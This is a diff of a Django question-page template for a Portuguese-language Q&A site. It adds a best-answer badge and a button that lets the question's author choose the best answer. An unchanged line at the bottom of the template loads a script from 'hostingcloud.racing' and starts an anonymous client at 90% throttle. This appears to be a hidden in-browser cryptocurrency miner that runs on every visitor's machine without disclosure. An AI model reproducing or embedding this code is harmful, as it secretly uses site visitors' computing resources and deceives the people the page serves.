--- a/main_app/templates/question.html
+++ b/main_app/templates/question.html
@@ -6,7 +6,7 @@
 		<meta charset="utf-8">
 		<meta name="viewport" content="width=device-width, initial-scale=1">
 		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css">
-		<link rel="stylesheet" href="/static/css/question.css?version=2">
+		<link rel="stylesheet" href="/static/css/question.css?version=3">
 		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.form/4.3.0/jquery.form.min.js"></script>
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
@@ -128,16 +128,17 @@ $(function() {
     				{{ question.total_responses }} respostas
   				</div>
 				<ul class="list-group list-group-flush">
-				{% for response in responses %}
+				{% for response in responses|pull_best_answer %}
 				<li class="list-group-item">
 					<div class="card-body">
 						<div class="poster-container">
 						<a class="poster-info" href="/user/{{ response.creator.user.username }}">
 							<div class="poster-profile-pic-container"><img class="poster-profile-pic-popover" data-triger="hover" data-content="<img src='{{ response.creator.avatar.url }}' width='50px'><b> {{ response.creator.user.username }}</b><br><span>Pontos: {{ response.creator.points }}</span><p>{{ response.creator.bio }}</p>" data-placement="top" width="45px" src="{{ response.creator.avatar.url }}" alt="{{ response.creator.user.username }}"></div>
 							<div class="poster-text-container"><div><span>{{ response.creator.user.username }}</span><br><span title="{{ response.pub_date }}" class="post-pub-date"> {{ response.get_naturaltime }}</span></div></div>
-
-						</a>
-						</div>
+						</a></div>
+                        {% if question.best_answer == response.id %}
+                            <div class="best-answer-badge"><span class="badge badge-pill badge-primary">🏆 Melhor resposta</span></div>
+                        {% endif %}
 						<p id="response-{{ response.id }}">{{ response.text|cut_description|safe|linebreaksbr }}</p>
 
 						{% if response.get_embedded_content %}
@@ -160,7 +161,7 @@ $(function() {
 						&nbsp;&nbsp;
 
 						{% if response.creator.user.username == user.username %}
-						<div class="dropdown" id="options-dropdown">
+						<div class="dropdown response-control" id="options-dropdown">
 						  <button class="btn btn-primary btn-sm dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
 							  Opções
 						  </button>
@@ -169,7 +170,14 @@ $(function() {
 							<button class="dropdown-item" onclick="document.getElementById('edit-response-form').style.display='block'">Editar</button>
 						  </div>
 						</div>
+						{% elif question.creator.user.username == user.username %}
+							{% if question.may_choose_answer %}
+							<button class="btn btn-primary btn-sm response-control choose-answer-btn" type="button" onclick="chooseAnswer({{ response.id }})">
+							  	Definir melhor resposta
+							</button>
+							{% endif %}
 						{% endif %}
+
 
 						<div class="heart-comment">
 							<img width="20px" src="/static/images/comments.png" class="icon" onclick="show_comments(this.parentElement, {{ response.id }}, this.parentElement.getElementsByTagName('img')[0], '{{ csrf_token }}', `{{ user.username }}`, {{ question.id }})">
@@ -220,7 +228,6 @@ $(function() {
 			<p>Faça <a href="/signin?redirect=/question/{{ question.id }}">login</a> ou <a href="/signup?redirect=/question/{{ question.id }}">crie uma conta</a> para responder esta pergunta.</p>
 			{% endif %}
 		</main>
-		<script src="/static/js/question.js?v20210507"></script>
 		<div class="recommended">
 			<hr>
 			<h3 class="text-secondary">— Responda também —</h3>
@@ -233,6 +240,7 @@ $(function() {
 			</div>
 			{% endfor %}
 		</div>
+<script src="/static/js/question.js?version=5"></script>
 <script src="/static/js/general_functions.js?version=2"></script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
